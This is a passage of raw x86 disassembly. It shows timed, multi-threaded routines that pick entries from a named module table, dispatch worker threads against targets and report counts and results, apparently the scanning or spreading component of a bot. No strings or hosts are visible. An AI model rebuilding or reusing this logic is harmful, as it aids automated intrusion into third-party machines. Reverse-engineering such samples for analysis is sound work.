push offset dword_41CE40
push [ebp+var_10]
call sub_416BA2 ; sscanf
add esp, 0Ch
push 6
push offset dword_41CE38
push [ebp+var_C]
call sub_416F80 ; _strnicmp
add esp, 0Ch
neg eax
sbb eax, eax
inc eax
mov [ebp+var_81C], eax
cmp [ebp+var_81C], 1
jnz short loc_4132BE
push 7
push offset dword_41CE30
push [ebp+var_C]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jz short loc_4132BE
xor eax, eax
jmp short locret_41331C
; ---------------------------------------------------------------------------
loc_4132BE: ; CODE XREF: sub_41308F+213�j
; sub_41308F+229�j
cmp [ebp+var_820], 1
jnz short loc_4132D5
cmp [ebp+var_81C], 0
jz short loc_4132D5
push 6
pop eax
jmp short locret_41331C
; ---------------------------------------------------------------------------
loc_4132D5: ; CODE XREF: sub_41308F+236�j
; sub_41308F+23F�j
cmp [ebp+var_820], 1
jnz short loc_4132EC
cmp [ebp+var_81C], 0
jnz short loc_4132EC
push 5
pop eax
jmp short locret_41331C
; ---------------------------------------------------------------------------
loc_4132EC: ; CODE XREF: sub_41308F+24D�j
; sub_41308F+256�j
cmp [ebp+var_820], 2
jnz short loc_413303
cmp [ebp+var_81C], 0
jz short loc_413303
push 6
pop eax
jmp short locret_41331C
; ---------------------------------------------------------------------------
loc_413303: ; CODE XREF: sub_41308F+264�j
; sub_41308F+26D�j
cmp [ebp+var_820], 2
jnz short loc_41331A
cmp [ebp+var_81C], 0
jnz short loc_41331A
push 5
pop eax
jmp short locret_41331C
; ---------------------------------------------------------------------------
loc_41331A: ; CODE XREF: sub_41308F:loc_413237�j
; sub_41308F+1B1�j ...
xor eax, eax
locret_41331C: ; CODE XREF: sub_41308F+30�j
; sub_41308F+66�j ...
leave
retn
sub_41308F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41331E proc near ; DATA XREF: sub_41349C+4EB�o
; sub_413CB3+27C�o
var_14C = dword ptr -14Ch
var_11A = dword ptr -11Ah
var_112 = dword ptr -112h
var_10E = dword ptr -10Eh
var_10A = byte ptr -10Ah
var_8A = dword ptr -8Ah
var_86 = byte ptr -86h
var_6 = byte ptr -6
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14Ch
push 14Ch
push [ebp+arg_0]
lea eax, [ebp+var_14C]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push 1
push [ebp+var_10E]
call sub_404457
pop ecx
pop ecx
lea eax, [ebp+var_10A]
push eax
push [ebp+var_10E]
call sub_4044F7
pop ecx
pop ecx
test eax, eax
jnz short loc_413381
push [ebp+var_10E]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_413498
; ---------------------------------------------------------------------------
loc_413381: ; CODE XREF: sub_41331E+4E�j
cmp [ebp+var_112], 0
jz short loc_4133B1
push [ebp+var_10E]
call sub_41308F
pop ecx
cmp [ebp+var_112], eax
jz short loc_4133B1
push [ebp+var_10E]
call sub_4053B1
pop ecx
xor eax, eax
jmp locret_413498
; ---------------------------------------------------------------------------
loc_4133B1: ; CODE XREF: sub_41331E+6A�j
; sub_41331E+7E�j
cmp [ebp+var_8A], 1
jnz short loc_4133E0
lea eax, [ebp+var_6]
push eax
push [ebp+var_10E]
call sub_404552
pop ecx
pop ecx
push offset dword_41F018
lea eax, [ebp+var_86]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_413444
; ---------------------------------------------------------------------------
loc_4133E0: ; CODE XREF: sub_41331E+9A�j
cmp [ebp+var_8A], 2
jnz short loc_413420
push 0Ah
lea eax, [ebp+var_6]
push eax
push 0FFFFh
push 401h
call sub_4103F5
pop ecx
pop ecx
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
lea eax, [ebp+var_10A]
push eax
lea eax, [ebp+var_86]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_413444
; ---------------------------------------------------------------------------
loc_413420: ; CODE XREF: sub_41331E+C9�j
call sub_412D4C
push eax
lea eax, [ebp+var_6]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
push offset dword_41F018
lea eax, [ebp+var_86]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_413444: ; CODE XREF: sub_41331E+C0�j
; sub_41331E+100�j
lea eax, [ebp+var_14C]
push eax
call [ebp+var_11A]
cmp [ebp+var_8A], 1
jnz short loc_41346F
push [ebp+var_10E]
push [ebp+var_14C]
call sub_412A3A
pop ecx
pop ecx
jmp short loc_41348A
; ---------------------------------------------------------------------------
loc_41346F: ; CODE XREF: sub_41331E+13A�j
cmp [ebp+var_8A], 2
jnz short loc_41348A
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_86]
push eax
call sub_412BC9
pop ecx
pop ecx
loc_41348A: ; CODE XREF: sub_41331E+14F�j
; sub_41331E+158�j
push [ebp+var_10E]
call sub_4053B1
pop ecx
xor eax, eax
locret_413498: ; CODE XREF: sub_41331E+5E�j
; sub_41331E+8E�j
leave
retn 4
sub_41331E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41349C proc near ; DATA XREF: sub_413AB0+1F4�o
var_774 = qword ptr -774h
var_764 = qword ptr -764h
var_75C = byte ptr -75Ch
var_65C = byte ptr -65Ch
var_658 = dword ptr -658h
var_654 = dword ptr -654h
var_650 = dword ptr -650h
var_64C = byte ptr -64Ch
var_648 = byte ptr -648h
var_644 = dword ptr -644h
var_640 = byte ptr -640h
var_62C = dword ptr -62Ch
var_628 = dword ptr -628h
var_624 = byte ptr -624h
var_51C = byte ptr -51Ch
var_50E = dword ptr -50Eh
var_50A = dword ptr -50Ah
var_506 = dword ptr -506h
var_502 = byte ptr -502h
var_37B = byte ptr -37Bh
var_37A = byte ptr -37Ah
var_377 = byte ptr -377h
var_36B = byte ptr -36Bh
var_36A = byte ptr -36Ah
var_35C = dword ptr -35Ch
var_358 = dword ptr -358h
var_354 = byte ptr -354h
var_341 = byte ptr -341h
var_296 = dword ptr -296h
var_20C = byte ptr -20Ch
var_20B = byte ptr -20Bh
var_10C = dword ptr -10Ch
var_108 = byte ptr -108h
var_107 = byte ptr -107h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 764h
push edi
push 2C9h
push [ebp+arg_0]
lea eax, [ebp+var_628]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
lea eax, [ebp+var_51C]
push eax
call sub_407A86
pop ecx
movzx eax, al
test eax, eax
jz short loc_4134F5
push 14Ch
push 0
lea eax, [ebp+var_358]
push eax
call sub_416B6A ; memset
add esp, 0Ch
jmp loc_4135BF
; ---------------------------------------------------------------------------
loc_4134F5: ; CODE XREF: sub_41349C+3C�j
and [ebp+var_62C], 0
jmp short loc_41350B
; ---------------------------------------------------------------------------
loc_4134FE: ; CODE XREF: sub_41349C:loc_4135BA�j
mov eax, [ebp+var_62C]
inc eax
mov [ebp+var_62C], eax
loc_41350B: ; CODE XREF: sub_41349C+60�j
mov eax, [ebp+var_62C]
imul eax, 3Ah
add eax, offset byte_41CD80
push eax
lea eax, [ebp+var_640]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
lea eax, [ebp+var_640]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_51C]
push eax
lea eax, [ebp+var_640]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_4135BA
mov eax, [ebp+var_62C]
imul eax, 3Ah
add eax, offset byte_41CD80
mov [ebp+var_358], eax
push 3Ah
mov eax, [ebp+var_62C]
imul eax, 3Ah
add eax, offset byte_41CD80
push eax
lea eax, [ebp+var_354]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_354]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_341]
push eax
call sub_4105FB
pop ecx
and [ebp+var_296], 0
lea eax, [ebp+var_341]
push eax
lea eax, [ebp+var_51C]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_4135BF
; ---------------------------------------------------------------------------
loc_4135BA: ; CODE XREF: sub_41349C+B0�j
jmp loc_4134FE
; ---------------------------------------------------------------------------
loc_4135BF: ; CODE XREF: sub_41349C+54�j
; sub_41349C+11C�j
lea eax, [ebp+var_624]
push eax
call sub_40806A
pop ecx
test eax, eax
jnz short loc_4135E3
push [ebp+var_628]
call sub_409763
pop ecx
xor eax, eax
jmp loc_413AAB
; ---------------------------------------------------------------------------
loc_4135E3: ; CODE XREF: sub_41349C+132�j
mov al, ds:byte_41DF00
mov [ebp+var_20C], al
push 3Fh
pop ecx
xor eax, eax
lea edi, [ebp+var_20B]
rep stosd
stosw
stosb
mov al, ds:byte_41DF00
mov [ebp+var_108], al
push 3Fh
pop ecx
xor eax, eax
lea edi, [ebp+var_107]
rep stosd
stosw
stosb
lea eax, [ebp+var_108]
push eax
lea eax, [ebp+var_624]
push eax
lea eax, [ebp+var_20C]
push eax
call sub_407F3D
add esp, 0Ch
test eax, eax
jnz short loc_41364D
push [ebp+var_628]
call sub_409763
pop ecx
xor eax, eax
jmp loc_413AAB
; ---------------------------------------------------------------------------
loc_41364D: ; CODE XREF: sub_41349C+19C�j
push [ebp+var_506]
call sub_404D10
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_413675
push [ebp+var_628]
call sub_409763
pop ecx
xor eax, eax
jmp loc_413AAB
; ---------------------------------------------------------------------------
loc_413675: ; CODE XREF: sub_41349C+1C4�j
cmp [ebp+var_358], 0
jz loc_413782
mov eax, [ebp+var_358]
mov eax, [eax+32h]
and eax, 1
test eax, eax
jz loc_413782
call sub_4042FB
mov [ebp+var_644], eax
cmp [ebp+var_644], 0
jz short loc_4136B6
mov [ebp+var_296], 2
jmp short loc_4136C0
; ---------------------------------------------------------------------------
loc_4136B6: ; CODE XREF: sub_41349C+20C�j
mov [ebp+var_296], 3
loc_4136C0: ; CODE XREF: sub_41349C+218�j
movsx eax, [ebp+var_36B]
test eax, eax
jz short loc_4136E5
mov eax, [ebp+var_358]
mov eax, [eax+32h]
and eax, 2
test eax, eax
jnz short loc_4136E5
mov [ebp+var_296], 1
loc_4136E5: ; CODE XREF: sub_41349C+22D�j
; sub_41349C+23D�j
movsx eax, [ebp+var_37B]
test eax, eax
jz short loc_4136FA
mov [ebp+var_296], 2
loc_4136FA: ; CODE XREF: sub_41349C+252�j
movsx eax, [ebp+var_37A]
test eax, eax
jz short loc_41370F
mov [ebp+var_296], 3
loc_41370F: ; CODE XREF: sub_41349C+267�j
cmp [ebp+var_296], 3
jnz short loc_41372B
cmp [ebp+var_644], 0
jz short loc_41372B
mov [ebp+var_296], 2
loc_41372B: ; CODE XREF: sub_41349C+27A�j
; sub_41349C+283�j
cmp [ebp+var_296], 3
jnz short loc_413782
mov al, [ebp+var_36A]
mov [ebp+var_64C], al
mov al, [ebp+var_377]
mov [ebp+var_648], al
mov [ebp+var_36A], 1
and [ebp+var_377], 0
push 0
lea eax, [ebp+var_502]
push eax
call sub_412F07
pop ecx
pop ecx
mov al, [ebp+var_64C]
mov [ebp+var_36A], al
mov al, [ebp+var_648]
mov [ebp+var_377], al
loc_413782: ; CODE XREF: sub_41349C+1E0�j
; sub_41349C+1F4�j ...
push offset dword_41E3A8
call sub_409C6C
pop ecx
push [ebp+var_50E]
lea eax, [ebp+var_51C]
push eax
lea eax, [ebp+var_624]
push eax
push offset dword_41CF28
mov eax, [ebp+var_628]
add eax, 14h
push eax
call sub_416B5E ; sprintf
add esp, 14h
push offset dword_41E3A8
call sub_409C7A
pop ecx
push [ebp+var_50E]
lea eax, [ebp+var_51C]
push eax
lea eax, [ebp+var_624]
push eax
mov eax, [ebp+var_628]
push dword ptr [eax]
push offset dword_41CEF0
lea eax, [ebp+var_502]
push eax
call sub_40D53F
add esp, 18h
cmp [ebp+var_358], 0
jnz short loc_413807
push 3E8h
call ds:dword_41709C ; Sleep
loc_413807: ; CODE XREF: sub_41349C+35E�j
and [ebp+var_10C], 0
call sub_416B64 ; clock
mov [ebp+var_35C], eax
and [ebp+var_4], 0
loc_41381D: ; CODE XREF: sub_41349C+3F9�j
; sub_41349C+44B�j ...
mov eax, [ebp+var_628]
cmp dword ptr [eax+4], 0
jnz short loc_413847
call sub_416B64 ; clock
add eax, [ebp+var_4]
sub eax, [ebp+var_35C]
mov ecx, [ebp+var_50E]
imul ecx, 3E8h
cmp eax, ecx
jb short loc_41384C
loc_413847: ; CODE XREF: sub_41349C+38B�j
jmp loc_413A43
; ---------------------------------------------------------------------------
loc_41384C: ; CODE XREF: sub_41349C+3A9�j
lea eax, [ebp+var_108]
push eax
lea eax, [ebp+var_20C]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
lea eax, [ebp+var_108]
push eax
lea eax, [ebp+var_624]
push eax
lea eax, [ebp+var_20C]
push eax
call sub_407F3D
add esp, 0Ch
push offset dword_41F018
lea eax, [ebp+var_20C]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_413897
jmp short loc_41381D
; ---------------------------------------------------------------------------
loc_413897: ; CODE XREF: sub_41349C+3F7�j
push [ebp+var_8]
push 0
lea eax, [ebp+var_51C]
push eax
lea eax, [ebp+var_20C]
push eax
call sub_404FE7
add esp, 0Ch
push eax
call sub_404D4D
pop ecx
pop ecx
mov [ebp+var_650], eax
cmp [ebp+var_650], 0
jz short loc_4138EC
call sub_416B64 ; clock
add eax, [ebp+var_4]
sub eax, [ebp+var_35C]
mov ecx, [ebp+var_50E]
imul ecx, 3E8h
cmp eax, ecx
jnb short loc_4138EC
jmp loc_41381D
; ---------------------------------------------------------------------------
loc_4138EC: ; CODE XREF: sub_41349C+42B�j
; sub_41349C+449�j
push [ebp+var_50A]
call ds:dword_41709C ; Sleep
push [ebp+var_8]
call sub_404E1C
pop ecx
test eax, eax
jz loc_413A35
loc_413909: ; CODE XREF: sub_41349C+4BA�j
; sub_41349C:loc_413A30�j
push [ebp+var_8]
call sub_404F24
pop ecx
mov [ebp+var_654], eax
cmp [ebp+var_654], 0
jnz short loc_413926
jmp loc_413A35
; ---------------------------------------------------------------------------
loc_413926: ; CODE XREF: sub_41349C+483�j
mov eax, [ebp+var_10C]
inc eax
mov [ebp+var_10C], eax
cmp [ebp+var_358], 0
jz short loc_4139B7
push 14Ch
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_658], eax
cmp [ebp+var_658], 0
jnz short loc_413958
jmp short loc_413909
; ---------------------------------------------------------------------------
loc_413958: ; CODE XREF: sub_41349C+4B8�j
push 14Ch
lea eax, [ebp+var_358]
push eax
push [ebp+var_658]
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_658]
mov ecx, [ebp+var_654]
mov [eax+3Eh], ecx
push [ebp+var_658]
push offset sub_41331E
call sub_409479
pop ecx
pop ecx
test eax, eax
jnz short loc_4139A5
push [ebp+var_658]
call sub_416B4C ; free
pop ecx
jmp short loc_4139B5
; ---------------------------------------------------------------------------
loc_4139A5: ; CODE XREF: sub_41349C+4F9�j
push [ebp+var_8]
push [ebp+var_654]
call sub_404D9B
pop ecx
pop ecx
loc_4139B5: ; CODE XREF: sub_41349C+507�j
jmp short loc_413A30
; ---------------------------------------------------------------------------
loc_4139B7: ; CODE XREF: sub_41349C+49E�j
mov eax, [ebp+var_628]
cmp dword ptr [eax+4], 0
jz short loc_4139C5
jmp short loc_413A35
; ---------------------------------------------------------------------------
loc_4139C5: ; CODE XREF: sub_41349C+525�j
lea eax, [ebp+var_75C]
push eax
push [ebp+var_654]
call sub_4044F7
pop ecx
pop ecx
mov al, [ebp+var_36A]
mov [ebp+var_65C], al
and [ebp+var_36A], 0
lea eax, [ebp+var_51C]
push eax
lea eax, [ebp+var_75C]
push eax
push offset dword_41CEDC
lea eax, [ebp+var_502]
push eax
call sub_40D53F
add esp, 10h
mov al, [ebp+var_65C]
mov [ebp+var_36A], al
push 3E8h
call ds:dword_41709C ; Sleep
mov eax, [ebp+var_4]
add eax, 3E8h
mov [ebp+var_4], eax
loc_413A30: ; CODE XREF: sub_41349C:loc_4139B5�j
jmp loc_413909
; ---------------------------------------------------------------------------
loc_413A35: ; CODE XREF: sub_41349C+467�j
; sub_41349C+485�j ...
push [ebp+var_8]
call sub_404F7D
pop ecx
jmp loc_41381D
; ---------------------------------------------------------------------------
loc_413A43: ; CODE XREF: sub_41349C:loc_413847�j
push [ebp+var_10C]
call sub_416B64 ; clock
sub eax, [ebp+var_35C]
mov dword ptr [ebp+var_764], eax
and dword ptr [ebp+var_764+4], 0
fild [ebp+var_764]
fdiv ds:flt_417270
push ecx
push ecx
fstp [esp+774h+var_774]
lea eax, [ebp+var_51C]
push eax
lea eax, [ebp+var_624]
push eax
push offset unk_41CE98
lea eax, [ebp+var_502]
push eax
call sub_40D53F
add esp, 1Ch
push [ebp+var_8]
call sub_404FD0
pop ecx
push [ebp+var_628]
call sub_409763
pop ecx
xor eax, eax
loc_413AAB: ; CODE XREF: sub_41349C+142�j
; sub_41349C+1AC�j ...
pop edi
leave
retn 4
sub_41349C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413AB0 proc near ; CODE XREF: sub_40A9CF+BCB�p
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 34h
cmp [ebp+arg_4], 0
jz short loc_413AC2
cmp [ebp+arg_8], 0
jnz short loc_413AC7
loc_413AC2: ; CODE XREF: sub_413AB0+A�j
jmp locret_413CB1
; ---------------------------------------------------------------------------
loc_413AC7: ; CODE XREF: sub_413AB0+10�j
push [ebp+arg_8]
call sub_407A86
pop ecx
movzx eax, al
test eax, eax
jz short loc_413AEB
push [ebp+arg_8]
call sub_40422A
pop ecx
test eax, eax
jnz short loc_413AE9
jmp locret_413CB1
; ---------------------------------------------------------------------------
loc_413AE9: ; CODE XREF: sub_413AB0+32�j
jmp short loc_413B45
; ---------------------------------------------------------------------------
loc_413AEB: ; CODE XREF: sub_413AB0+25�j
and [ebp+var_14], 0
jmp short loc_413AF8
; ---------------------------------------------------------------------------
loc_413AF1: ; CODE XREF: sub_413AB0:loc_413B43�j
mov eax, [ebp+var_14]
inc eax
mov [ebp+var_14], eax
loc_413AF8: ; CODE XREF: sub_413AB0+3F�j
mov eax, [ebp+var_14]
imul eax, 3Ah
movsx eax, ds:byte_41CD80[eax]
test eax, eax
jnz short loc_413B0E
jmp locret_413CB1
; ---------------------------------------------------------------------------
loc_413B0E: ; CODE XREF: sub_413AB0+57�j
mov eax, [ebp+var_14]
imul eax, 3Ah
add eax, offset byte_41CD80
push eax
lea eax, [ebp+var_28]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
lea eax, [ebp+var_28]
push eax
call sub_4105FB
pop ecx
push [ebp+arg_8]
lea eax, [ebp+var_28]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_413B43
jmp short loc_413B45
; ---------------------------------------------------------------------------
loc_413B43: ; CODE XREF: sub_413AB0+8F�j
jmp short loc_413AF1
; ---------------------------------------------------------------------------
loc_413B45: ; CODE XREF: sub_413AB0:loc_413AE9�j
; sub_413AB0+91�j
cmp [ebp+arg_C], 0
jz short loc_413B59
push [ebp+arg_C]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_2C], eax
jmp short loc_413B60
; ---------------------------------------------------------------------------
loc_413B59: ; CODE XREF: sub_413AB0+99�j
mov [ebp+var_2C], 15180h
loc_413B60: ; CODE XREF: sub_413AB0+A7�j
mov eax, [ebp+var_2C]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_413B75
cmp [ebp+var_4], 15180h
jbe short loc_413B7C
loc_413B75: ; CODE XREF: sub_413AB0+BA�j
mov [ebp+var_4], 15180h
loc_413B7C: ; CODE XREF: sub_413AB0+C3�j
cmp [ebp+arg_10], 0
jz short loc_413B90
push [ebp+arg_10]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_30], eax
jmp short loc_413B97
; ---------------------------------------------------------------------------
loc_413B90: ; CODE XREF: sub_413AB0+D0�j
mov [ebp+var_30], 7D0h
loc_413B97: ; CODE XREF: sub_413AB0+DE�j
mov eax, [ebp+var_30]
mov [ebp+var_C], eax
cmp [ebp+var_C], 32h
jb short loc_413BAC
cmp [ebp+var_C], 0EA60h
jbe short loc_413BB3
loc_413BAC: ; CODE XREF: sub_413AB0+F1�j
mov [ebp+var_C], 7D0h
loc_413BB3: ; CODE XREF: sub_413AB0+FA�j
cmp [ebp+arg_14], 0
jz short loc_413BC7
push [ebp+arg_14]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_34], eax
jmp short loc_413BCE
; ---------------------------------------------------------------------------
loc_413BC7: ; CODE XREF: sub_413AB0+107�j
mov [ebp+var_34], 100h
loc_413BCE: ; CODE XREF: sub_413AB0+115�j
mov eax, [ebp+var_34]
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz short loc_413BE3
cmp [ebp+var_10], 200h
jbe short loc_413BEA
loc_413BE3: ; CODE XREF: sub_413AB0+128�j
mov [ebp+var_10], 100h
loc_413BEA: ; CODE XREF: sub_413AB0+131�j
push 2C9h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_413C03
jmp locret_413CB1
; ---------------------------------------------------------------------------
loc_413C03: ; CODE XREF: sub_413AB0+14C�j
push 108h
push [ebp+arg_4]
mov eax, [ebp+var_8]
add eax, 4
push eax
call sub_407A56
add esp, 0Ch
push 0Eh
push [ebp+arg_8]
mov eax, [ebp+var_8]
add eax, 10Ch
push eax
call sub_407A56
add esp, 0Ch
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
mov [eax+11Ah], ecx
mov eax, [ebp+var_8]
mov ecx, [ebp+var_C]
mov [eax+11Eh], ecx
mov eax, [ebp+var_8]
mov ecx, [ebp+var_10]
mov [eax+122h], ecx
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_8]
add eax, 126h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+var_10]
push [ebp+var_C]
mov eax, [ebp+var_8]
push dword ptr [eax+11Ah]
mov eax, [ebp+var_8]
add eax, 10Ch
push eax
mov eax, [ebp+var_8]
add eax, 4
push eax
push offset unk_41CF54
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
neg eax
sbb eax, eax
inc eax
push eax
push [ebp+var_8]
push offset sub_41349C
call sub_4095A4
add esp, 24h
locret_413CB1: ; CODE XREF: sub_413AB0:loc_413AC2�j
; sub_413AB0+34�j ...
leave
retn
sub_413AB0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413CB3 proc near ; DATA XREF: sub_413FE7+5C�o
var_49C = dword ptr -49Ch
var_498 = byte ptr -498h
var_494 = byte ptr -494h
var_490 = dword ptr -490h
var_48C = dword ptr -48Ch
var_488 = dword ptr -488h
var_484 = dword ptr -484h
var_480 = dword ptr -480h
var_47C = byte ptr -47Ch
var_469 = byte ptr -469h
var_3BE = dword ptr -3BEh
var_334 = dword ptr -334h
var_330 = dword ptr -330h
var_32C = byte ptr -32Ch
var_1AC = byte ptr -1ACh
var_25 = byte ptr -25h
var_24 = byte ptr -24h
var_21 = byte ptr -21h
var_15 = byte ptr -15h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 49Ch
push 327h
push [ebp+arg_0]
lea eax, [ebp+var_330]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
mov eax, [ebp+var_330]
push dword ptr [eax]
push offset unk_41D000
lea eax, [ebp+var_1AC]
push eax
call sub_40D53F
add esp, 0Ch
and [ebp+var_334], 0
and [ebp+var_484], 0
lea eax, [ebp+var_4]
push eax
push offset dword_418F4C
lea eax, [ebp+var_32C]
push eax
call sub_40813C
add esp, 0Ch
mov [ebp+var_8], eax
loc_413D21: ; CODE XREF: sub_413CB3:loc_413FA8�j
mov eax, [ebp+var_334]
inc eax
mov [ebp+var_334], eax
and [ebp+var_488], 0
jmp short loc_413D44
; ---------------------------------------------------------------------------
loc_413D37: ; CODE XREF: sub_413CB3+23B�j
; sub_413CB3:loc_413F77�j
mov eax, [ebp+var_488]
inc eax
mov [ebp+var_488], eax
loc_413D44: ; CODE XREF: sub_413CB3+82�j
mov eax, [ebp+var_488]
imul eax, 3Ah
cmp ds:off_41CDAE[eax], 0
jz loc_413F7C
push 3Ah
mov eax, [ebp+var_488]
imul eax, 3Ah
add eax, offset byte_41CD80
push eax
lea eax, [ebp+var_47C]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_488]
imul eax, 3Ah
add eax, offset byte_41CD80
mov [ebp+var_480], eax
lea eax, [ebp+var_47C]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_469]
push eax
call sub_4105FB
pop ecx
cmp [ebp+var_480], 0
jz loc_413E9A
mov eax, [ebp+var_480]
mov eax, [eax+32h]
and eax, 1
test eax, eax
jz loc_413E9A
call sub_4042FB
mov [ebp+var_490], eax
cmp [ebp+var_490], 0
jz short loc_413DE9
mov [ebp+var_3BE], 2
jmp short loc_413DF3
; ---------------------------------------------------------------------------
loc_413DE9: ; CODE XREF: sub_413CB3+128�j
mov [ebp+var_3BE], 3
loc_413DF3: ; CODE XREF: sub_413CB3+134�j
movsx eax, [ebp+var_15]
test eax, eax
jz short loc_413E15
mov eax, [ebp+var_480]
mov eax, [eax+32h]
and eax, 2
test eax, eax
jnz short loc_413E15
mov [ebp+var_3BE], 1
loc_413E15: ; CODE XREF: sub_413CB3+146�j
; sub_413CB3+156�j
movsx eax, [ebp+var_25]
test eax, eax
jz short loc_413E27
mov [ebp+var_3BE], 2
loc_413E27: ; CODE XREF: sub_413CB3+168�j
movsx eax, [ebp+var_24]
test eax, eax
jz short loc_413E39
mov [ebp+var_3BE], 3
loc_413E39: ; CODE XREF: sub_413CB3+17A�j
cmp [ebp+var_3BE], 3
jnz short loc_413E55
cmp [ebp+var_490], 0
jz short loc_413E55
mov [ebp+var_3BE], 2
loc_413E55: ; CODE XREF: sub_413CB3+18D�j
; sub_413CB3+196�j
cmp [ebp+var_3BE], 3
jnz short loc_413E9A
mov al, [ebp+var_14]
mov [ebp+var_498], al
mov al, [ebp+var_21]
mov [ebp+var_494], al
mov [ebp+var_14], 1
and [ebp+var_21], 0
push 0
lea eax, [ebp+var_1AC]
push eax
call sub_412F07
pop ecx
pop ecx
mov al, [ebp+var_498]
mov [ebp+var_14], al
mov al, [ebp+var_494]
mov [ebp+var_21], al
loc_413E9A: ; CODE XREF: sub_413CB3+FC�j
; sub_413CB3+110�j ...
movsx eax, [ebp+var_13]
neg eax
sbb eax, eax
and eax, 1388h
add eax, 1388h
push eax
push 0
lea eax, [ebp+var_469]
push eax
push [ebp+var_8]
call sub_4050EA
add esp, 10h
mov [ebp+var_48C], eax
cmp [ebp+var_48C], 0
jz loc_413F77
push 14Ch
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_49C], eax
cmp [ebp+var_49C], 0
jnz short loc_413EF3
jmp loc_413D37
; ---------------------------------------------------------------------------
loc_413EF3: ; CODE XREF: sub_413CB3+239�j
push 14Ch
lea eax, [ebp+var_480]
push eax
push [ebp+var_49C]
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_484]
inc eax
mov [ebp+var_484], eax
mov eax, [ebp+var_49C]
mov ecx, [ebp+var_48C]
mov [eax+3Eh], ecx
push [ebp+var_49C]
push offset sub_41331E
call sub_409479
pop ecx
pop ecx
test eax, eax
jnz short loc_413F59
push [ebp+var_48C]
call sub_4053B1
pop ecx
push [ebp+var_49C]
call sub_416B4C ; free
pop ecx
jmp short loc_413F77
; ---------------------------------------------------------------------------
loc_413F59: ; CODE XREF: sub_413CB3+28A�j
lea eax, [ebp+var_47C]
push eax
push [ebp+var_8]
push offset dword_41CFD0
lea eax, [ebp+var_1AC]
push eax
call sub_40D53F
add esp, 10h
loc_413F77: ; CODE XREF: sub_413CB3+21B�j
; sub_413CB3+2A4�j
jmp loc_413D37
; ---------------------------------------------------------------------------
loc_413F7C: ; CODE XREF: sub_413CB3+A1�j
lea eax, [ebp+var_4]
push eax
push offset dword_418F4C
push 0
call sub_40813C
add esp, 0Ch
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_413F9A
jmp short loc_413FAD
; ---------------------------------------------------------------------------
loc_413F9A: ; CODE XREF: sub_413CB3+2E3�j
mov eax, [ebp+var_330]
cmp dword ptr [eax+4], 0
jz short loc_413FA8
jmp short loc_413FAD
; ---------------------------------------------------------------------------
loc_413FA8: ; CODE XREF: sub_413CB3+2F1�j
jmp loc_413D21
; ---------------------------------------------------------------------------
loc_413FAD: ; CODE XREF: sub_413CB3+2E5�j
; sub_413CB3+2F3�j
push [ebp+var_334]
push [ebp+var_484]
mov eax, [ebp+var_330]
push dword ptr [eax]
push offset dword_41CF8C
lea eax, [ebp+var_1AC]
push eax
call sub_40D53F
add esp, 14h
push [ebp+var_330]
